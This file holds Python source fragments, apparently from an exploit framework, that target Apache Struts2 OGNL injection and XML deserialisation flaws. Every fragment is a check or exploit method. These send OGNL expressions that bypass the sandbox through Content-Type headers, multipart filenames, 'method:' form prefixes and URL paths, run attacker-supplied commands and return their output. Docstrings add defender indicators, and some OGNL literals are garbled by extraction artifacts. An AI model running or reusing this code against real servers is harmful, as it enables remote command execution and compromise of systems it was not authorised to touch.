def exploit(self, cmd):
    """Send ``cmd`` through the Content-Type header and return the reply text.

    Whatever ``self.payload(cmd)`` returns is sent as the entire
    ``Content-Type`` request header, and the command is also sent
    base64-encoded in an ``x-ids`` request header. On HTTP 200 the ``x-ids``
    response header is base64-decoded and returned with a ``[*]`` prefix; if
    that header is missing or cannot be decoded, the response body is
    returned instead. Any other outcome yields the fixed error string.

    Defender note: in proxy or WAF logs this request shows a Content-Type
    value that is not a media type, plus an ``x-ids`` header on both the
    request and the response.
    """
    # assumes Http.post(headers, body) -- the helper is defined elsewhere
    client = http.Http(self.options)
    headers = {
        'Content-Type': self.payload(cmd),
        'x-ids': base64.b64encode(cmd),
    }
    # The form body is filler; only its first letter is randomised.
    filler = random.choice('abcdefwx') + '1=123456'
    resp = client.post(headers, filler)

    succeeded = resp != None and resp.status_code == 200
    if not succeeded:
        return '[!] execute cmd error.'
    try:
        decoded = base64.b64decode(resp.headers['x-ids'])
        return '[*] %s' % (decoded)
    except:
        # No usable x-ids header: fall back to the raw body.
        return resp.text
def exploit(self, cmd):
    """Send ``cmd`` through the ``pic`` form field and return the reply text.

    The value of ``self.payload(cmd)`` is URL-quoted and posted as the
    ``pic`` parameter of a urlencoded form; the command itself travels
    base64-encoded in an ``x-ids`` request header. On HTTP 200 the ``x-ids``
    response header is base64-decoded and returned with a ``[*]`` prefix,
    falling back to the response body when that fails.

    Defender note: the observable pattern is a form POST whose ``pic`` field
    holds a quoted expression, with ``x-ids`` present in both directions.
    """
    # assumes Http.post(headers, body) -- the helper is defined elsewhere
    client = http.Http(self.options)
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'x-ids': base64.b64encode(cmd),
    }
    form_body = 'pic=' + quote(self.payload(cmd))
    resp = client.post(headers, form_body)

    succeeded = resp != None and resp.status_code == 200
    if not succeeded:
        return '[!] execute cmd error.'
    try:
        decoded = base64.b64decode(resp.headers['x-ids'])
        return '[*] %s' % (decoded)
    except:
        # No usable x-ids header: fall back to the raw body.
        return resp.text
def check(self):
    """Return True if the target echoes the probe marker for the ``pic`` vector.

    Posts a urlencoded form whose ``pic`` field is a URL-quoted ``%{...}``
    expression. The expression asks the servlet response object to add the
    header ``x-ids: x123#`` and then close the writer. The target is reported
    as affected only when the reply is HTTP 200 and carries exactly that
    header value; any exception while inspecting the reply counts as False.

    Defender note: the marker ``x-ids: x123#`` in a response, and the split
    class-name string concatenation in the request body, are both stable
    strings to alert on.
    """
    client = http.Http(self.options)
    # NOTE(review): literal reproduced exactly as extracted; the backslash-space
    # sequences look like collapsed line continuations and are not reconstructed.
    expr = '''\ (#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.disp'+'atcher.Htt'+'pSe'+'rvletRe'+'sponse'].addHeader('x-ids','x123#')).\ (#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.disp'+'atcher.Htt'+'pSe'+'rvletRe'+'sponse'].getWriter().close())\ '''
    form_body = 'pic=' + quote('%{' + expr + '}')
    resp = client.post({'Content-Type': 'application/x-www-form-urlencoded'},
                       form_body)
    try:
        marker_seen = (resp != None
                       and resp.status_code == 200
                       and resp.headers['x-ids'] == 'x123#')
        if marker_seen:
            return True
        return False
    except:
        # Missing header or malformed response: treat as not affected.
        return False
def exploit(self, cmd):
    """Send ``cmd`` through a multipart upload filename and return the reply text.

    A hand-built multipart body is posted in which the ``filename`` attribute
    of the single part is ``self.payload(cmd)`` followed by a NUL byte and
    ``x``. The command is also sent base64-encoded in an ``x-ids`` request
    header. On HTTP 200 the ``x-ids`` response header is base64-decoded and
    returned with a ``[*]`` prefix, falling back to the response body.

    Defender note: a multipart ``filename`` containing a NUL byte, the fixed
    boundary digits ``6105`` and the ``x-ids`` header are the visible
    indicators of this request.
    """
    client = http.Http(self.options)
    # Raw multipart template; %s is the filename slot, CRLFs are written as \x0d\x0a.
    part_template = "----------6105\x0d\x0aContent-Disposition:form-data;name=\"x\";filename=\"%s\x00x\"\x0d\x0a\x0d\x0a\x0d\x0a----------6105--\x0d\x0a"
    headers = {
        'Content-Type': 'multipart/form-data;boundary=--------6105',
        'x-ids': base64.b64encode(cmd),
    }
    body = part_template % (self.payload(cmd))
    resp = client.post(headers, body)

    succeeded = resp != None and resp.status_code == 200
    if not succeeded:
        return '[!] execute cmd error.'
    try:
        decoded = base64.b64decode(resp.headers['x-ids'])
        return '[*] %s' % (decoded)
    except:
        # No usable x-ids header: fall back to the raw body.
        return resp.text
def check(self):
    """Return True if the target echoes the probe marker for the Content-Type vector.

    Sends a ``%{...}`` expression as the entire ``Content-Type`` request
    header. As written, the expression clears the excluded package and class
    lists on the OGNL utility object and then adds the response header
    ``x-ids: x123#``. The target is reported as affected only when the reply
    is HTTP 200 with exactly that header value; any exception while
    inspecting the reply counts as False.

    Defender note: a Content-Type request header beginning with ``%{`` and a
    response header ``x-ids: x123#`` are the two strings to look for.
    """
    client = http.Http(self.options)
    # NOTE(review): literal reproduced exactly as extracted; the backslash-space
    # sequences and the '[email protected]' fragment look like page-extraction
    # artifacts and are deliberately not reconstructed.
    expr = '''\ ("multipart/form-data").\ (#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#x):(\ (#xx=#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.Act'+'ionCont'+'ext.co'+'nta'+'iner'].getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\ (#xx.getExcludedPackageNames().clear()).(#xx.getExcludedClasses().clear()).(#context.setMemberAccess(#x)))).\ (#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.disp'+'atcher.Htt'+'pSe'+'rvletRe'+'sponse'].addHeader('x-ids','x123#'))\ '''
    headers = {'Content-Type': '%{' + expr + '}'}
    # The form body is filler; only its first letter is randomised.
    filler = random.choice('abcdefwx') + '1=123456'
    resp = client.post(headers, filler)
    try:
        marker_seen = (resp != None
                       and resp.status_code == 200
                       and resp.headers['x-ids'] == 'x123#')
        if marker_seen:
            return True
        return False
    except:
        # Missing header or malformed response: treat as not affected.
        return False
def exploit(self, cmd):
    """Send ``cmd`` through the ``method:`` form prefix and return the reply text.

    ``self.payload(cmd)`` yields a pair: the first element is URL-quoted and
    posted after the literal ``method:``; the second is base64-encoded into
    request header ``2``. Request header ``1`` carries the base64 of the
    servlet response class name and header ``3`` the base64 of ``utf-8``.
    On HTTP 200 the response header ``1`` is base64-decoded and returned with
    a ``[*]`` prefix, falling back to the response body.

    Defender note: request headers literally named ``1``, ``2`` and ``3``
    with base64 values, and a form body starting with ``method:``, are the
    observable pattern.
    """
    client = http.Http(self.options)
    expression, command_arg = self.payload(cmd)
    response_class = base64.b64encode(
        'com.opensymphony.xwork2.dispatcher.HttpServletResponse')
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        '1': response_class,
        '2': base64.b64encode(command_arg),
        '3': base64.b64encode('utf-8'),
    }
    resp = client.post(headers, 'method:' + quote(expression))

    succeeded = resp != None and resp.status_code == 200
    if not succeeded:
        return '[!] execute cmd error.'
    try:
        decoded = base64.b64decode(resp.headers['1'])
        return '[*] %s' % (decoded)
    except:
        # No usable "1" header: fall back to the raw body.
        return resp.text
def check(self):
    """Return True if the target echoes the probe marker for the multipart vector.

    Posts a hand-built multipart body whose part ``filename`` is a ``%{...}``
    expression followed by a NUL byte and ``x``. As written, the expression
    clears the excluded package and class lists on the OGNL utility object
    and then adds the response header ``x-ids: x123#``. The target is
    reported as affected only when the reply is HTTP 200 with exactly that
    header value; any exception while inspecting the reply counts as False.

    Defender note: a multipart ``filename`` that starts with ``%{`` or holds
    a NUL byte, and a response header ``x-ids: x123#``, are the indicators.
    """
    client = http.Http(self.options)
    # NOTE(review): literal reproduced exactly as extracted; the backslash-space
    # sequences and the '[email protected]' fragment look like page-extraction
    # artifacts and are deliberately not reconstructed.
    expr = '''\ (#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#x):(\ (#xx=#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.Act'+'ionCont'+'ext.co'+'nta'+'iner'].getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\ (#xx.getExcludedPackageNames().clear()).(#xx.getExcludedClasses().clear()).(#context.setMemberAccess(#x)))).\ (#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.disp'+'atcher.Htt'+'pSe'+'rvletRe'+'sponse'].addHeader('x-ids','x123#'))\ '''
    # Raw multipart template; %s is the filename slot, CRLFs are written as \x0d\x0a.
    part_template = "----------6105\x0d\x0aContent-Disposition:form-data;name=\"x\";filename=\"%s\x00x\"\x0d\x0a\x0d\x0a\x0d\x0a----------6105--\x0d\x0a"
    headers = {'Content-Type': 'multipart/form-data;boundary=--------6105'}
    body = part_template % ('%{' + expr + '}')
    resp = client.post(headers, body)
    try:
        marker_seen = (resp != None
                       and resp.status_code == 200
                       and resp.headers['x-ids'] == 'x123#')
        if marker_seen:
            return True
        return False
    except:
        # Missing header or malformed response: treat as not affected.
        return False
def exploit(self, cmd):
    """Send ``cmd`` through the URL path and return the reply text.

    ``self.payload(cmd)`` yields a pair: the first element is URL-quoted and
    appended to the request URL after a ``/``; the second is base64-encoded
    into request header ``2``. Request header ``1`` carries the base64 of the
    servlet response class name and header ``3`` the base64 of ``utf-8``.
    The request is a GET. On HTTP 200 the response header ``1`` is
    base64-decoded and returned with a ``[*]`` prefix, falling back to the
    response body.

    Defender note: a GET whose last path segment is a quoted expression,
    accompanied by request headers literally named ``1``, ``2`` and ``3``,
    is the observable pattern.
    """
    client = http.Http(self.options)
    expression, command_arg = self.payload(cmd)
    path_suffix = '/' + quote(expression)
    client.url = client.url + path_suffix
    # assumes Http.get(headers) -- the helper is defined elsewhere
    headers = {
        '1': base64.b64encode(
            'com.opensymphony.xwork2.dispatcher.HttpServletResponse'),
        '2': base64.b64encode(command_arg),
        '3': base64.b64encode('utf-8'),
    }
    resp = client.get(headers)

    succeeded = resp != None and resp.status_code == 200
    if not succeeded:
        return '[!] execute cmd error.'
    try:
        decoded = base64.b64decode(resp.headers['1'])
        return '[*] %s' % (decoded)
    except:
        # No usable "1" header: fall back to the raw body.
        return resp.text
def check(self):
    """Probe the ``method:`` vector and record the reported OS name on success.

    Posts a urlencoded form that starts with ``method:`` and a URL-quoted
    expression, followed by two parameters with randomised one-letter
    prefixes: one holds the servlet response class name, the other the
    property name ``os.name``. As written, the expression asks the server to
    put that system property into a response header named ``1``. When the
    reply is HTTP 200 and header ``1`` is non-empty, its value is stored in
    ``self.options['OS']['Value']`` and True is returned; everything else,
    including any exception, yields False.

    Defender note: a form body beginning with ``method:`` that also carries
    ``=os.name``, and a response header literally named ``1``, are the
    indicators.
    """
    client = http.Http(self.options)
    # NOTE(review): literal reproduced exactly as extracted; the backslash-space
    # sequences and the '[email protected]' fragment look like page-extraction
    # artifacts and are deliberately not reconstructed.
    template = '''\ (#[email protected]@DEFAULT_MEMBER_ACCESS).\ (#x=#parameters.%s[0],#context[#x].addHeader(1,@java.lang.System@getProperty(#parameters.%s[0]))).\ (#x=#context[#x].getWriter()).(#x.println(1),#x.flush(),#x.close())?x:x\ '''
    class_param = random.choice('abcdefwx') + '1'
    prop_param = random.choice('abcdefwx') + '2'
    form_body = ('method:' + quote(template % (class_param, prop_param))
                 + '&' + class_param
                 + '=com.opensymphony.xwork2.dispatcher.HttpServletResponse&'
                 + prop_param + '=os.name')
    resp = client.post({'Content-Type': 'application/x-www-form-urlencoded'},
                       form_body)
    try:
        if resp != None and resp.status_code == 200:
            reported_os = resp.headers['1']
            if len(reported_os) > 0:
                # Remember the value for later use by the rest of the tool.
                self.options['OS']['Value'] = reported_os
                return True
        return False
    except:
        # Missing header or malformed response: treat as not affected.
        return False
def exploit(self, cmd):
    """Post an XML document built from ``cmd`` and report completion.

    ``cmd`` is passed through ``cgi.escape`` before being handed to
    ``self.payload``, and the result is posted with
    ``Content-Type: application/xml``. The response is never inspected, so
    the returned string says only that the request was sent, not that
    anything ran.

    Defender note: because nothing is read back, evidence of this request is
    found only on the server side (the XML request body and any resulting
    deserialisation errors in the application log).
    """
    client = http.Http(self.options)
    escaped_cmd = cgi.escape(cmd)
    xml_body = self.payload(escaped_cmd)
    client.post({'Content-Type': 'application/xml'}, xml_body)
    return '[*] execute cmd finish.'
def check(self):
    """Return True if the target answers the XML probe with the cast error.

    Posts ``self.payload('')`` as ``application/xml`` and reports the target
    as affected when the reply is HTTP 500 and its body contains the
    ClassCastException text naming ``java.security.Provider$Service``.

    Defender note: that exception string appearing in an error page or in the
    application log after an XML POST is the indicator this check relies on;
    suppressing stack traces in responses hides it from the client but not
    from server-side logs.
    """
    client = http.Http(self.options)
    resp = client.post({'Content-Type': 'application/xml'}, self.payload(''))
    cast_error = 'java.lang.String cannot be cast to java.security.Provider$Service'
    if resp != None and resp.status_code == 500 and cast_error in resp.text:
        return True
    return False